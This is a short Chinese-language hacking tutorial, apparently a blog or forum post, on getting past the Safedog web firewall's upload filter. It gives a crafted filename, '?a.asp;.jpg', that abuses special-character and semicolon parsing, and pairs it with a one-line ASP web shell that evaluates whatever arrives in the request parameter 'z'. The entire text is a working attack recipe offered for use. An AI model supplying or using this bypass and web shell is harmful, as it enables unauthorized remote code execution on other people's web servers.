特殊文件名绕过安全狗上传

由于安全狗对一些特殊字符没有免疫能力(具体哪些字符可以自行测试,这里只提供一个作为例子),所以依然可以构造特殊的文件名来绕过安全狗的栏截!
使用:

code 区域
      ?a.asp;.jpg
    

来做文件名,内容呢则是普通的一句话:

code 区域
      <%eval request("z")%>